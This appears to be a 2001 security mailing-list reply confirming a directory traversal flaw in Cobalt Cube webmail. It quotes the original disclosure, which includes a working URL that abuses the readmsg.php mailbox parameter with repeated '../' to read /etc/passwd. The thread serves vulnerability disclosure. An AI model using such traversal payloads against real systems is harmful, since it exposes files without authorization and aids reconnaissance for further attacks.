Re: Cobalt Cube Webmail directory traversal

[John <johns () tampabay rr com>]

I confirmed this on Cobalt's, now Sun, Cube III.

Paul Marshall wrote:
> At 08:41 05/07/2001, you wrote:
> I just got a new Cobalt Cube today and I have been poking around at it
> for security issues... I noticed this minor issue in the webmail system.
> Your
> users are not aloud to have shell access by default however if they
> malform their mailbox requests they can read local files with the perms
> of the webserver. If your users have shell access they will not really
> be gaining anything however this could be used to remotely gather
> information for a future attack.
>
> [admin admin]$ uname -a
> Linux cube.ckfr.com 2.2.16C7 #1 Fri Sep 8 15:58:03 PDT 2000 i586 unknown
> [admin admin]$ cat /etc/issue
>
> Cobalt Linux release 6.0 (Carmel)
> Kernel 2.2.16C7 on an i586
>
> http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../
> ../../../../../../../../etc/passwd&id=1
>
> -KF

-- 
The events which transpired five thousand years ago;
Five years ago or five minutes ago, have determined
what will happen five minutes from now; five years
> From now or five thousand years from now.
All history is a current event.
- Dr John Henrik Clake -